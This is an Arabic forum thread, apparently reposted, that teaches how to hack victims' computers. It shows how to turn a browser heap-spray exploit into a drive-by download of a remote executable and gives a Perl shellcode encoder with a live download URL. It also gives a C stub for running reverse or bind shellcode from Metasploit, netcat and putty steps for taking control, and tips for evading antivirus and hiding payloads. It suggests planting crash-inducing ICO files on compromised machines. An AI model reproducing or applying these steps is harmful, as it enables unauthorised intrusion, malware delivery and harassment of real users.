مشاهدة : 3595
النتائج 1 الى 3 من 3

اختراق الاجهزه بطرق احترافيه (هكر الكمبيوتر)

  1. #1
    صورة mr-jaw14
    mr-jaw14 غير متصل طالب متوسط
    تاريخ التسجيل
    Sep 2008
    الدولة
    الشرقيه
    المشاركات
    226
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    بسم الله الرحمن الرحيم
    ،
    ،
    ،


    --[ المقدمة]--
    موضوعي اليوم يتحدث عن الثغرات الطفح و حجب الخدمة
    وشرح طريقة الاختراق باستخدام الشيل كود والهدف من موضوعي
    هوا تعلم طرق الاختراق الاحترافية
    والاستغناء عن برامج الاختراق





    --[الثغرات]--

    ثغرات الطفح (remote buffer) التي ساتحدث عنها اليوم هي التي
    تسمح باختراق الاجهزة بملف HTML
    عندما نسمع كلمة ثغرات نعتقد انها شيء معقد
    لكنها بسيطة جدا وما نحتاج الا ان نجد ثغرة مناسبة
    نذهب الى موقع ميلورم milw0rm - exploits : vulnerabilities : videos : papers : shellcode

    والثغرات التي سوف اتحدث عنها نجدها في قسم (remote)




    وعلينا ايجاد ثغرة تكون في نظام الوندوز
    اعطيكم شرح مبسط لطريقة عملها
    ناخذ مثال على ثغرة


    كود:
    Program Checker (sasatl.dll 1.5.0.531)
    DebugMsgLog Heap Spraying Exploitوهذا رابط الثغرة
    Program Checker (sasatl.dll 1.5.0.531) DebugMsgLog Heap Spraying Exploit
    سوف يفيد كثيرا اذا كنت تجيد اللغة الانجليزية
    لانها تختلف طريقة كتابة المعلومات من ثغرة لثغرة


    كود:
    sasatl.dll is a library included in the Program Checker
    Pro software package from the Company Zenturi.
    http://www.programchecker.comوتعني ان الثغرة توجد بملف sasatl.dll
    وهذا الملف نجده في برنامج program checker
    وموقع البرنامج
    ProgramChecker - The online resource to your computer's programs!
    والثغرة تشتغل فقط على من يستخدم البرنامج هذا

    وتمت التجربة على


    كود:
    Tested In- Windows XP SP1/SP2 English/French with IE 6.0 / 7.0.
    - Windows vista Professional English/French SP1 with IE 7.0وطريقة استخدامها لتحميل السيرفر وتشغيله في جهاز الضحية هيا كالتالي :

    في البداية ننسخ كود ال HTML الذي في اسفل الصفحة

    ونلصقه بالمفكرة
    ويوجد دائما في الثغرات المشابهة لهذه الثغرة كود unescape
    وهوا عبارة عن ****lcode مشفر
    وهذا شيل كود جاهز وطريقة تشفيره سهلة
    لاحظ معي الاداة التالية


    كود PHP:
    $html = "FezO.txt";
    $FeezO =
    "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\ x56\ x8B\x76\x20\x03".
    "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\ x14\ x28\x38\xF2\x74".
    "\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\ x75\ xE7\x5E\x8B\x5E".
    "\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\ xDD\ x8B\x04\x8B\x03".
    "\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\ x6C\ x00\x43\x3A\x5C".
    "\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\ x30\ x78\x0C\x8B\x40".
    "\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\ x40\ x34\x8D\x40\x7C".
    "\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\ xFF\ xFF\xFF\x83\xEC".
    "\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\ x1A\ x2F\x70\xE8\x6F".
    "\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\ xDB\ x53\x53\x52\xEB".
    "\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\ x53\ xFF\xFF\xFF\x83".
    "\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\ xE2\ x73\xE8\x40\xFF".
    "\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF".
    "http://3asfh.com/file.exe";

    if ($ARGV[0] eq ''){
    $Fz0 = $FeezO;$fez0 = $ARGV[1];$fez0 = "http://pan";

    }
    #citation to ****sploit
    sub dongu {
    my $FeeezO = shift;
    my $Feeez0 = shift() || 'LE';
    my $feeez0 = '';

    my $idx = 0;

    if (length($FeeezO) % 2 != 0) {
    $data .= substr($FeeezO, -1, 1);
    }

    while ($idx < length($FeeezO) - 1) {
    my $c1 = ord(substr($FeeezO, $idx, 1));
    my $c2 = ord(substr($FeeezO, $idx+1, 1));
    if ($Feeez0 eq 'LE') {
    $feeez0 .= sprintf('%%u%.2x%.2x', $c2, $c1);
    } else {
    $feeez0 .= sprintf('%%u%.2x%.2x', $c1, $c2);
    }
    $idx += 2;
    }

    return $feeez0;
    }
    $Fez00 = dongu($Fz0);
    #_
    $body = <<BODY;

    ****lcode unescape("%u9090%u9090$Fez00");



    BODY

    print H $body;

    print "
    [================================================== ======================
    [// FeezO ****lcodes Encoder v1.0
    [//
    [// fez0\@hotmail.com
    [//
    [================================================== ======================
    ";

    print "Encoded ****lcode=\n\n unescape(\"%u9090%u9090$Fez00\") \n\nDone.. Have fune "

    انسخ الكود بالكامل والصقه بالمفكرة
    واستبدل الرابط الذي بداخله برابط السيرفر الخاص بك



    (
    بالطبع الاداة مكتوبة بالبيرل
    وسوف تحتاج المترجم الخاص بها)

    بعد استبدال الرابط نفتحها عن طريق موجة الاوامر




    لاحظ الاداة اعطتنا الشيل كود جاهز
    والان نرجع الى محور حديثنا .. الثغرة
    ونستبدل الشيل كود





    والان نحفظ الصفحة بامتداد HTML او HTM
    واصبحت جاهز للاختراق
    عند فتحها سوف يتحمل السيرفر في جهاز الضحية

    ،
    ،
    ،


    ناخذ طرق اخرى لاستخدام الثغرات
    هذه طريقة استخدمنا فيها شيل كود Download and Execute

    تحدثت سابقا عن انواعها وطريقة الحصول عليها من موقع ميتاسبلويت
    وتوجد طريقة اخرى وهيا عبر البرنامج ( برنامج ميتاسبلويت )

    وهيا عن طريق كتابة الاوامر التالية

    Show PAYLOADS




    واكتب الامر use وبعده اسم ال payload الذري تريد استخدامه




    والان اكتب show options
    لتعبئة البيانات التي تريد استخدامها



    لتعديل البيانات اكتب الامر set
    وبعد الانتهاء اكتب generate
    وسوف ينتجلك الشيل كود



    لكي نستخدمها في الثغرة السابقة يجب علينا تشفير الكود
    بنفس الطريقة السابقة وبنفس الاداة
    وهيا كالتالي
    ننسخ الشيل كود
    ونلصقه في الاداة



    ونحفظ المستند بامتداد pl مع تصحيح بعض الرموز عند الاستبدال
    ونشغله عن طريق موجة الاوامر



    وسوف ياتينا الشيل كود مشفر
    وننسخه ونستبدله بالكود المشفر الذي في الثغرة

    وانتهينا

    الخلاصة هيا :

    عندما نستخدم ثغرة من الثغرات التي تسمح لنا الاختراق بملف html
    يجب علينا في البداية صنع شيل كود ومن ثم تشفيره
    وبعدها استبداله بالشيل كود الموجود بالثغرة ولكن توجد ثغرات
    لا تحتاج الى تشفير ولكن استبدال الشيل كود مباشرة

    ,

    وتوجد ثغرات كثيره تنزل يوميا في مواقع الحماية
    لكن يجب علينا ان نبحث عن ثغرة في برنامج مشهور ويكثر استخدامه
    مثل ثغرات المتصفح



    ،
    ،
    ،
    ،

    ناتي الان لثغرات حجب الخدمة (denial of service)
    الثغرات هذه لا تسمح باختراق الجهاز
    فقط تقوم ب ( تعليقه )
    وهيا سهلة ولا تحتاج اي تعب او خبرة
    وهيا تكون عبر ارسال ملف ولا يجب ان يكون exe
    وسوف يسبب تعليق في جهاز المرسل اليه
    وتوجد ملفات تعلق الجهاز عند فتحها
    وبعضها لا تحتاج الى فتح
    اكمل القراءة ان لم تفهم ما اقصده

    من موقع ميلورم اذهب الى (dos/poc)



    والثغرات كثيرة واكثرها تقوم بنفس العمل
    ولكن اختلافها يكون في نوع الملف المصاب

    وناخذ مثال على هذه ثغرة Ms Windows GDI+ICO File
    وهذا رابطها MS Windows GDI+ ICO File Remote Denial of Service Exploit

    افتح الرابط الذي في الثغرة
    وحمل الملف ولكن لا تفتح ضغط عنه
    فقط اسحبه الى مجلد فارغ
    ولاحظ ماذا يحدث عند فتح هذا المجلد

    ( بطئ في الجهاز ويتسبب في غلق المجلد)

    هذا يعني عندما تخترق جهاز احدهم
    ضع هذا الملف في جميع مجلداته
    ،
    وسوف تسبب له ازعاج شديد

    ،
    ،
    ،



    --[x03:اختراق الاجهزة باستخدام ال ****lcodes ]--

    لن ادخل في مقدمات عن استخدامها
    تحدث في القسم الاول في الموضوع عن استخدام ال ****lcodes
    في الثغرات

    لكنا دعنا نتحدث عن طريقة استخدامها مباشرة
    دون اللجوء الى ثغرة
    بمعنى ان نقوم بتحويلها الى ملف exe
    ويتم ارسالها الى الضحية واختراق جهازه
    و برامج الحماية مثل الكاسبر لا تكشفها
    وتحدثت في القسم الاول في الموضوع لطريقة استخدام الثغرة لتحميل ملف وتشغيله في جهاز الضحية
    اذا لو حولنا هذا ال ****lcode مباشرة الى ملف exe
    سوف يصبح عندنا (داونلودر) مشفر ...
    وهكذا على حسب نوع ال ****lcode الذي نقوم بتحويله

    ،
    ،

    ان لم تكن تفهم ماذا يعني ال ****lcode
    تابع القراءة وسوف تفهم
    ،
    ،


    في البداية اذهب الى هذا الموقع
    http://****sploit.com:55555/PAYLOADS

    (ملاحظة ضع كلمه m e t a مكان النجوم)
    واختر windows reverse ****l



    Reverse = تعني اتصال عكسي
    ومثل برامج الاتصال العكسي
    اكتب الاي بي الخاص بك
    والمنفذ



    واظغط على Generate




    والان انسخ الشيل كود مثل الصورة التي بالاسفل



    وافتح المفكرة
    واكتب فيها الكود الذي بالاسفل


    كود:
    #include <stdio.h>
    char ****lcode[]=
    "\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\ x5b\ x81\x73\x13\xf3"
    "\x75\x47\x94\x83\xeb\xfc\xe2\xf4\x0f\x9d\x03\ x94\ xf3\x75\xcc\xd1"
    "\xcf\xfe\x3b\x91\x8b\x74\xa8\x1f\xbc\x6d\xcc\ xcb\ xd3\x74\xac\xdd"
    "\x78\x41\xcc\x95\x1d\x44\x87\x0d\x5f\xf1\x87\ xe0\ xf4\xb4\x8d\x99"
    "\xf2\xb7\xac\x60\xc8\x21\x63\x90\x86\x90\xcc\ xcb\ xd7\x74\xac\xf2"
    "\x78\x79\x0c\x1f\xac\x69\x46\x7f\x78\x69\xcc\ x95\ x18\xfc\x1b\xb0"
    "\xf7\xb6\x76\x54\x97\xfe\x07\xa4\x76\xb5\x3f\ x98\ x78\x35\x4b\x1f"
    "\x83\x69\xea\x1f\x9b\x7d\xac\x9d\x78\xf5\xf7\ x94\ xf3\x75\xcc\xfc"
    "\xcf\x2a\x76\x62\x93\x23\xce\x6c\x70\xb5\x3c\ xc4\ x9b\x85\xcd\x90"
    "\xac\x1d\xdf\x6a\x79\x7b\x10\x6b\x14\x16\x26\ xf8\ x90\x5b\x22\xec"
    "\x96\x75\x47\x94";


    main()
    {
    void (*routine) ();
    (long) routine = &****lcode;
    routine();
    }واستبدل فيها ال ****lcode الخاص بك
    واحفظها بامتداد c
    بالطبع نحتاج الى مترجم لتحويل الملف الى exe
    وتوجد مترجمات كثيرة
    لكن لن اتحدث عنها لانها ليست محور حديثنا

    ،
    ،

    بعد تحويل الملف الى exe
    ارسله الى الضحية



    ،
    ،

    والان نتنصت باستخدام اداة النت كات
    (الاداة تاتي مع برنامج ميتاسبلويت)
    او يمكن تحميلها بشكل منفصل من الرابط التالي
    http://www.vulnwatch.org/netcat/nc111nt.zip

    نتنصت بالنت كات ... باستخدام الامر التالي


    كود:
    -l –n –v –p port

    بالطبع نكتب نفس البورت الذي كتبناه في البداية عند انشاء الشيل كود
    والان ارسل الشيل كود للضحية
    وعندما يفتحه سوف يتصل مع النت كات

    وتستطيع الان تصفح ملفات الضحية



    ،
    ،
    ،


    والان الاختراق ب الاتصال المباشر

    ،
    ،
    في البداية اذهب الى موقع ميتاسبلويت
    http://****sploit.com:55555/PAYLOADS
    واختر windows bind ****l


    واكتب المنفذ الذي تريد فتحه في جهاز الضحية


    واضغط على Generate
    وننسخ الشيل كود ونضعه في الكود السابق
    ونحفظها بامتداد c
    ونترجمها الى ملف exe
    والان نرسل الشيل كود للضحية
    ونتصل بجهازه باداة putty

    ( الاداة هذه مرفقة مع برنامج ميتاسبلويت)
    وتستطيع تحميلها بشكل منصل من الرابط ادناه
    http://the.earth.li/~sgtatham/putty/.../x86/putty.exe

    شرح الاداة ...
    Host name (or ip address) =اي بي الضحية
    Port= لمنفذ المفتوح بجهاز الضحية
    وضع النقطة على Raw
    واضغط على open
    وسوف تفتح لك شاشة الاوامر متصلة بجهاز الضحية

    وتستطيع من برنامج النت كات الاتصال بجهاز الضحية
    وتكون عبر الامر التالي

    كود:
    -v -n ip port،
    ،
    ،
    اما بالنسبة لاستخدام ال Download And Execute
    فهيا بسيطة جدا

    في البداية اذهب الى الرابط ادناه
    http://****sploit.com:55555/PAYLOADS...64%65%78%65%63

    وفي مربع DATA
    اكتب رابط السيرفر الخاص بك

    وافعل كما شرحت اعلاه
    ،
    ،
    ،

    ملاحظات بسيطه
    تستطيع بعد عمل ال****lcode ان تضغطه ببرامج الضغط مثل ال upx
    والافضل ان تدمجه مع ملف exe اخر عن طريق اداة iexpress
    في الوندوز
    وجعل ال****lcode لا يظهر عند التشغيل
    لانه عند تشغيله تاتي شاشة الدوس السوداء وهيا الطريقة الافضل للتخلص منها


    --------------------------------------------------------------------

    ملاحظه/الموضوع منقول











    مع تحياتي:mr-jaw









    واتمنى اشوف اردودكم

    فيس بوك

  2. #2
    عشقي طيبه غير متصل جاي معه ملفه
    تاريخ التسجيل
    Dec 2007
    المشاركات
    2
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    الله يعطيك العافيه ياررب وربي شرحك رووعه

    كفيت ووفيت

  3. #3
    elkasas غير متصل جاي معه ملفه
    تاريخ التسجيل
    Oct 2009
    الدولة
    القاهرة
    المشاركات
    7
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    شكراااا اااا ااا


اختراق الاجهزه بطرق احترافيه (هكر الكمبيوتر)


مواضيع على تشابه

  1. مشاركات: 1
    اخر رد: 12-05-2013, 10:54 PM
  2. مشاركات: 1
    اخر رد: 11-05-2013, 09:09 PM
  3. مشاركات: 0
    اخر رد: 11-01-2013, 08:27 PM
  4. مشاركات: 0
    اخر رد: 02-01-2013, 12:13 AM
  5. اختراق الاجهزه بطرق احترافيه ارجو التثبيت
    بواسطة المظلوم في المنتدى ممنوع - موضوع × مواضيع
    مشاركات: 9
    اخر رد: 04-03-2008, 08:01 PM

كلمات دليلية Tags

الدورات التدريبية جامعة نجران - ارشيف - تراسل
يشرفنا اعجابك على فيس بوك facebook